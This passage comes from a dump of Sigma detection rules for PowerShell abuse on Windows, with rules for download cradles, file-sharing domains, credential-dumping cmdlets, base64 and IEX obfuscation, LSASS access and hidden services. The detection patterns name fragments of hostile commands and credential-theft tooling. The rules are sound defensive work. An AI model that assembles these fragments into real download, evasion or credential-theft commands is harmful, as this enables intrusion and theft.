    "content": "title: PowerShell Download Pattern\nid: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7\nrelated:\n    - id: e6c54d94-498c-4562-a37c-b469d8e9a275\n      type: derived\n    - id: 8f70ac5f-1f6f-4f8e-b454-db19561216c5\n      type: obsolete\nstatus: test\ndescription: Detects a Powershell process that contains download commands in its command line string\nreferences:\n    - https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html\n    - https://lab52.io/blog/winter-vivern-all-summer/\n    - https://hatching.io/blog/powershell-analysis/\nauthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro\ndate: 2019-01-16\nmodified: 2025-10-20\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell_ise.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell_ISE.EXE'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'new-object'\n            - 'net.webclient).'\n            - 'download'\n        CommandLine|contains:\n            - 'string('\n            - 'file('\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_download_susp_file_sharing_domains.yml",
    "content": "title: Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE\nid: b6e04788-29e1-4557-bb14-77f761848ab8\nstatus: test\ndescription: Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\n    - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv\n    - https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/\n    - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-02-23\nmodified: 2024-12-10\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_websites:\n        CommandLine|contains:\n            # Note: You might want to baseline the github domain before including it\n            # - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea).\n            - 'anonfiles.com'\n            - 'cdn.discordapp.com'\n            - 'ddns.net'\n            - 'dl.dropboxusercontent.com'\n            - 'ghostbin.co'\n            # - 'github.com'  See note above\n            - 'glitch.me'\n            - 'gofile.io'\n            - 'hastebin.com'\n            - 'mediafire.com'\n            - 'mega.nz'\n            - 'onrender.com'\n            - 'pages.dev'\n            - 'paste.ee'\n            - 'pastebin.com'\n            - 'pastebin.pl'\n            - 'pastetext.net'\n            - 'pixeldrain.com'\n            - 'privatlab.com'\n            - 'privatlab.net'\n            - 'send.exploit.in'\n            - 'sendspace.com'\n            - 'storage.googleapis.com'\n            - 'storjshare.io'\n            - 'supabase.co'\n            - 'temp.sh'\n            - 'transfer.sh'\n            - 'trycloudflare.com'\n            - 'ufile.io'\n            - 'w3spaces.com'\n            - 'workers.dev'\n    selection_download:\n        CommandLine|contains:\n            - '.DownloadString('\n            - '.DownloadFile('\n            - 'Invoke-WebRequest '\n            - 'iwr '\n            - 'wget '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_dsinternals_cmdlets.yml",
    "content": "title: DSInternals Suspicious PowerShell Cmdlets\nid: 43d91656-a9b2-4541-b7e2-6a9bd3a13f4e\nrelated:\n    - id: 846c7a87-8e14-4569-9d49-ecfd4276a01c\n      type: similar\nstatus: test\ndescription: |\n    Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files.\n    The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\nreferences:\n    - https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.PowerShell/DSInternals.psd1\nauthor: Nasreddine Bencherchali (Nextron Systems), Nounou Mbeiri\ndate: 2024-06-26\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'Add-ADDBSidHistory'\n            - 'Add-ADNgcKey'\n            - 'Add-ADReplNgcKey'\n            - 'ConvertFrom-ADManagedPasswordBlob'\n            - 'ConvertFrom-GPPrefPassword'\n            - 'ConvertFrom-ManagedPasswordBlob'\n            - 'ConvertFrom-UnattendXmlPassword'\n            - 'ConvertFrom-UnicodePassword'\n            - 'ConvertTo-AADHash'\n            - 'ConvertTo-GPPrefPassword'\n            - 'ConvertTo-KerberosKey'\n            - 'ConvertTo-LMHash'\n            - 'ConvertTo-MsoPasswordHash'\n            - 'ConvertTo-NTHash'\n            - 'ConvertTo-OrgIdHash'\n            - 'ConvertTo-UnicodePassword'\n            - 'Disable-ADDBAccount'\n            - 'Enable-ADDBAccount'\n            - 'Get-ADDBAccount'\n            - 'Get-ADDBBackupKey'\n            - 'Get-ADDBDomainController'\n            - 'Get-ADDBGroupManagedServiceAccount'\n            - 'Get-ADDBKdsRootKey'\n            - 'Get-ADDBSchemaAttribute'\n            - 'Get-ADDBServiceAccount'\n            - 'Get-ADDefaultPasswordPolicy'\n            - 'Get-ADKeyCredential' # Covers 'Get-ADKeyCredentialLink'\n            - 'Get-ADPasswordPolicy'\n            - 'Get-ADReplAccount'\n            - 'Get-ADReplBackupKey'\n            - 'Get-ADReplicationAccount'\n            - 'Get-ADSIAccount'\n            - 'Get-AzureADUserEx'\n            - 'Get-BootKey'\n            - 'Get-KeyCredential'\n            - 'Get-LsaBackupKey'\n            - 'Get-LsaPolicy' # Covers 'Get-LsaPolicyInformation'\n            - 'Get-SamPasswordPolicy'\n            - 'Get-SysKey'\n            - 'Get-SystemKey'\n            - 'New-ADDBRestoreFromMediaScript'\n            - 'New-ADKeyCredential' # Covers 'New-ADKeyCredentialLink'\n            - 'New-ADNgcKey'\n            - 'New-NTHashSet'\n            - 'Remove-ADDBObject'\n            - 'Save-DPAPIBlob'\n            - 'Set-ADAccountPasswordHash'\n            - 'Set-ADDBAccountPassword' # Covers 'Set-ADDBAccountPasswordHash'\n            - 'Set-ADDBBootKey'\n            - 'Set-ADDBDomainController'\n            - 'Set-ADDBPrimaryGroup'\n            - 'Set-ADDBSysKey'\n            - 'Set-AzureADUserEx'\n            - 'Set-LsaPolicy' # Covers 'Set-LSAPolicyInformation'\n            - 'Set-SamAccountPasswordHash'\n            - 'Set-WinUserPasswordHash'\n            - 'Test-ADDBPasswordQuality'\n            - 'Test-ADPasswordQuality'\n            - 'Test-ADReplPasswordQuality'\n            - 'Test-PasswordQuality'\n            - 'Unlock-ADDBAccount'\n            - 'Write-ADNgcKey'\n            - 'Write-ADReplNgcKey'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of DSInternals for administration or audit purpose.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_email_exfil.yml",
    "content": "title: Email Exifiltration Via Powershell\nid: 312d0384-401c-4b8b-abdf-685ffba9a332\nstatus: test\ndescription: Detects email exfiltration via powershell cmdlets\nreferences:\n    - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/\n    - https://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml\nauthor: Nasreddine Bencherchali (Nextron Systems),  Azure-Sentinel (idea)\ndate: 2022-09-09\ntags:\n    - attack.exfiltration\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains|all:\n            - 'Add-PSSnapin'\n            - 'Get-Recipient'\n            - '-ExpandProperty'\n            - 'EmailAddresses'\n            - 'SmtpAddress'\n            - '-hidetableheaders'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml",
    "content": "title: Potential Suspicious Windows Feature Enabled - ProcCreation\nid: c740d4cf-a1e9-41de-bb16-8a46a4f57918\nrelated:\n    - id: 55c925c1-7195-426b-a136-a9396800e29b\n      type: similar\nstatus: test\ndescription: |\n    Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\n    Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps\n    - https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system\n    - https://learn.microsoft.com/en-us/windows/wsl/install-on-server\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-29\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmd:\n        CommandLine|contains|all:\n            - 'Enable-WindowsOptionalFeature'\n            - '-Online'\n            - '-FeatureName'\n    selection_feature:\n        # Add any insecure/unusual windows features that you don't use in your environment\n        CommandLine|contains:\n            - 'TelnetServer'\n            - 'Internet-Explorer-Optional-amd64'\n            - 'TFTP'\n            - 'SMB1Protocol'\n            - 'Client-ProjFS'\n            - 'Microsoft-Windows-Subsystem-Linux'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage of the features listed in the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_encode.yml",
    "content": "title: Suspicious Execution of Powershell with Base64\nid: fb843269-508c-4b76-8b8d-88679db22ce7\nstatus: test\ndescription: Commandline to launch powershell with a base64 payload\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets\n    - https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\n    - https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/\nauthor: frack113\ndate: 2022-01-02\nmodified: 2023-01-05\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - \\powershell.exe\n            - \\pwsh.exe\n        CommandLine|contains:\n            - ' -e '\n            - ' -en '\n            - ' -enc '\n            - ' -enco'\n            - ' -ec '\n    filter_encoding:\n        CommandLine|contains: ' -Encoding '\n    filter_azure:\n        ParentImage|contains:\n            - 'C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\'\n            - '\\gc_worker.exe'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_encoding_patterns.yml",
    "content": "title: Potential Encoded PowerShell Patterns In CommandLine\nid: cdf05894-89e7-4ead-b2b0-0a5f97a90f2f\nrelated:\n    - id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6\n      type: similar\nstatus: test\ndescription: Detects specific combinations of encoding methods in PowerShell via the commandline\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65\nauthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton\ndate: 2020-10-11\nmodified: 2023-01-26\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_to_1:\n        CommandLine|contains:\n            - 'ToInt'\n            - 'ToDecimal'\n            - 'ToByte'\n            - 'ToUint'\n            - 'ToSingle'\n            - 'ToSByte'\n    selection_to_2:\n        CommandLine|contains:\n            - 'ToChar'\n            - 'ToString'\n            - 'String'\n    selection_gen_1:\n        CommandLine|contains|all:\n            - 'char'\n            - 'join'\n    selection_gen_2:\n        CommandLine|contains|all:\n            - 'split'\n            - 'join'\n    condition: selection_img and (all of selection_to_* or 1 of selection_gen_*)\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_exec_data_file.yml",
    "content": "title: Powershell Inline Execution From A File\nid: ee218c12-627a-4d27-9e30-d6fb2fe22ed2\nstatus: test\ndescription: Detects inline execution of PowerShell code from a file\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50\nauthor: frack113\ndate: 2022-12-25\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_exec:\n        CommandLine|contains:\n            - 'iex '\n            - 'Invoke-Expression '\n            - 'Invoke-Command '\n            - 'icm '\n    selection_read:\n        CommandLine|contains:\n            - 'cat '\n            - 'get-content '\n            - 'type '\n    selection_raw:\n        CommandLine|contains: ' -raw'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_export_certificate.yml",
    "content": "title: Certificate Exported Via PowerShell\nid: 9e716b33-63b2-46da-86a4-bd3c3b9b5dfb\nrelated:\n    - id: aa7a3fce-bef5-4311-9cc1-5f04bb8c308c\n      type: similar\nstatus: test\ndescription: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.\nreferences:\n    - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a\n    - https://learn.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate?view=windowsserver2022-ps\n    - https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-18\ntags:\n    - attack.credential-access\n    - attack.execution\n    - attack.t1552.004\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'Export-PfxCertificate '\n            - 'Export-Certificate '\n    condition: selection\nfalsepositives:\n    - Legitimate certificate exports by administrators. Additional filters might be required.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml",
    "content": "title: Base64 Encoded PowerShell Command Detected\nid: e32d4572-9826-4738-b651-95fa63747e8a\nstatus: test\ndescription: Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string\nreferences:\n    - https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-01-29\nmodified: 2023-01-26\ntags:\n    - attack.t1027\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1140\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: '::FromBase64String('\n    condition: selection\nfalsepositives:\n    - Administrative script libraries\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_frombase64string_archive.yml",
    "content": "title: Suspicious FromBase64String Usage On Gzip Archive - Process Creation\nid: d75d6b6b-adb9-48f7-824b-ac2e786efe1f\nrelated:\n    - id: df69cb1d-b891-4cd9-90c7-d617d90100ce\n      type: similar\nstatus: test\ndescription: Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43\nauthor: frack113\ndate: 2022-12-23\ntags:\n    - attack.command-and-control\n    - attack.t1132.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'FromBase64String'\n            - 'MemoryStream'\n            - 'H4sI'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml",
    "content": "title: PowerShell Get-Clipboard Cmdlet Via CLI\nid: b9aeac14-2ffd-4ad3-b967-1354a4e628c3\nrelated:\n    - id: 4cbd4f12-2e22-43e3-882f-bff3247ffb78\n      type: derived\nstatus: test\ndescription: Detects usage of the 'Get-Clipboard' cmdlet via CLI\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/16\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-05-02\nmodified: 2022-12-25\ntags:\n    - attack.collection\n    - attack.t1115\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: 'Get-Clipboard'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml",
    "content": "title: Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet\nid: c8a180d6-47a3-4345-a609-53f9c3d834fc\nrelated:\n    - id: cef24b90-dddc-4ae1-a09a-8764872f69fc\n      type: similar\nstatus: test\ndescription: Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet\nreferences:\n    - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-10\ntags:\n    - attack.discovery\n    - attack.t1087.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Covers group and localgroup flags\n    selection_cmdlet:\n        CommandLine|contains: 'Get-LocalGroupMember '\n    selection_group:\n        CommandLine|contains:\n            # Add more groups for other languages\n            - 'domain admins'\n            - ' administrator' # Typo without an 'S' so we catch both\n            - ' administrateur' # Typo without an 'S' so we catch both\n            - 'enterprise admins'\n            - 'Exchange Trusted Subsystem'\n            - 'Remote Desktop Users'\n            - 'Utilisateurs du Bureau à distance' # French for \"Remote Desktop Users\"\n            - 'Usuarios de escritorio remoto' # Spanish for \"Remote Desktop Users\"\n    condition: all of selection_*\nfalsepositives:\n    - Administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_getprocess_lsass.yml",
    "content": "title: PowerShell Get-Process LSASS\nid: b2815d0d-7481-4bf0-9b6c-a4c48a94b349\nstatus: test\ndescription: Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity\nreferences:\n    - https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-04-23\nmodified: 2023-01-05\ntags:\n    - attack.credential-access\n    - attack.t1552.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            # You can add more permutation as you see fit\n            - 'Get-Process lsas'\n            - 'ps lsas'\n            - 'gps lsas'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml",
    "content": "title: Abuse of Service Permissions to Hide Services Via Set-Service\nid: 514e4c3a-c77d-4cde-a00f-046425e2301e\nrelated:\n    - id: a537cfc3-4297-4789-92b5-345bfd845ad0\n      type: derived\n    - id: 953945c5-22fe-4a92-9f8a-a9edc1e522da\n      type: similar\nstatus: test\ndescription: Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)\nreferences:\n    - https://twitter.com/Alh4zr3d/status/1580925761996828672\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\pwsh.exe'\n        - OriginalFileName: 'pwsh.dll'\n    selection_sddl:\n        # Example would be: \"D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)\"\n        CommandLine|contains|all:\n            - 'Set-Service '\n            - 'DCLCWPDTSD'\n    selection_cmdlet:\n        CommandLine|contains:\n            - '-SecurityDescriptorSddl '\n            - '-sd '\n    condition: all of selection_*\nfalsepositives:\n    - Rare intended use of hidden services\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_iex_patterns.yml",
    "content": "title: Suspicious PowerShell IEX Execution Patterns\nid: 09576804-7a05-458e-a817-eb718ca91f54\nstatus: test\ndescription: Detects suspicious ways to run Invoke-Execution using IEX alias\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2\n    - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-03-24\nmodified: 2022-11-28\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_combined_1:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains:\n            - ' | iex;'\n            - ' | iex '\n            - ' | iex}'\n            - ' | IEX ;'\n            - ' | IEX -Error'\n            - ' | IEX (new'\n            - ');IEX '\n    selection_combined_2:\n        CommandLine|contains:\n            - '::FromBase64String'\n            - '.GetString([System.Convert]::'\n    selection_standalone:\n        CommandLine|contains:\n            - ')|iex;$'\n            - ');iex($'\n            - ');iex $'\n            - ' | IEX | '\n            - ' | iex\\\"'\n    condition: all of selection_combined_* or selection_standalone\nfalsepositives:\n    - Legitimate scripts that use IEX\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml",
    "content": "title: Root Certificate Installed From Susp Locations\nid: 5f6a601c-2ecb-498b-9c33-660362323afa\nstatus: test\ndescription: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\nreferences:\n    - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/\n    - https://learn.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-09\nmodified: 2023-01-16\ntags:\n    - attack.defense-evasion\n    - attack.t1553.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'Import-Certificate'\n            - ' -FilePath '\n            - 'Cert:\\LocalMachine\\Root'\n        CommandLine|contains:\n            - '\\AppData\\Local\\Temp\\'\n            - ':\\Windows\\TEMP\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Perflogs\\'\n            - ':\\Users\\Public\\'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml",
    "content": "title: Import PowerShell Modules From Suspicious Directories - ProcCreation\nid: c31364f7-8be6-4b77-8483-dd2b5a7b69a3\nrelated:\n    - id: 21f9162c-5f5d-4b01-89a8-b705bd7d10ab\n      type: similar\nstatus: test\ndescription: Detects powershell scripts that import modules from suspicious directories\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-10\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'Import-Module \"$Env:Temp\\'\n            - Import-Module '$Env:Temp\\\n            - 'Import-Module $Env:Temp\\'\n            - 'Import-Module \"$Env:Appdata\\'\n            - Import-Module '$Env:Appdata\\\n            - 'Import-Module $Env:Appdata\\'\n            - 'Import-Module C:\\Users\\Public\\'\n            # Import-Module alias is \"ipmo\"\n            - 'ipmo \"$Env:Temp\\'\n            - ipmo '$Env:Temp\\\n            - 'ipmo $Env:Temp\\'\n            - 'ipmo \"$Env:Appdata\\'\n            - ipmo '$Env:Appdata\\\n            - 'ipmo $Env:Appdata\\'\n            - 'ipmo C:\\Users\\Public\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml",
    "content": "title: Unsigned AppX Installation Attempt Using Add-AppxPackage\nid: 37651c2a-42cd-4a69-ae0d-22a4349aa04a\nrelated:\n    - id: 975b2262-9a49-439d-92a6-0709cccdf0b2\n      type: similar\n    - id: 9a025188-6f2d-42f8-bb2f-d3a83d24a5af\n      type: similar\nstatus: test\ndescription: Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages\nreferences:\n    - https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package\n    - https://twitter.com/WindowsDocs/status/1620078135080325122\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-31\ntags:\n    - attack.persistence\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cmdlet:\n        CommandLine|contains:\n            - 'Add-AppPackage '\n            - 'Add-AppxPackage '\n    selection_flag:\n        CommandLine|contains: ' -AllowUnsigned'\n    condition: all of selection_*\nfalsepositives:\n    - Installation of unsigned packages for testing purposes\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_invocation_specific.yml",
    "content": "title: Suspicious PowerShell Invocations - Specific - ProcessCreation\nid: 536e2947-3729-478c-9903-745aaffe60d2\nrelated:\n    - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c\n      type: obsolete\n    - id: ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71\n      type: similar\n    - id: 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090\n      type: similar\nstatus: test\ndescription: Detects suspicious PowerShell invocation command parameters\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-05\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_convert_b64:\n        CommandLine|contains|all:\n            - '-nop'\n            - ' -w '\n            - 'hidden'\n            - ' -c '\n            - '[Convert]::FromBase64String'\n    selection_iex:\n        CommandLine|contains|all:\n            - ' -w '\n            - 'hidden'\n            - '-noni'\n            - '-nop'\n            - ' -c '\n            - 'iex'\n            - 'New-Object'\n    selection_enc:\n        CommandLine|contains|all:\n            - ' -w '\n            - 'hidden'\n            - '-ep'\n            - 'bypass'\n            - '-Enc'\n    selection_reg:\n        CommandLine|contains|all:\n            - 'powershell'\n            - 'reg'\n            - 'add'\n            - '\\software\\'\n    selection_webclient:\n        CommandLine|contains|all:\n            - 'bypass'\n            - '-noprofile'\n            - '-windowstyle'\n            - 'hidden'\n            - 'new-object'\n            - 'system.net.webclient'\n            - '.download'\n    selection_iex_webclient:\n        CommandLine|contains|all:\n            - 'iex'\n            - 'New-Object'\n            - 'Net.WebClient'\n            - '.Download'\n    filter_chocolatey:\n        CommandLine|contains:\n            - \"(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1\"\n            - 'Write-ChocolateyWarning'\n    condition: 1 of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml",
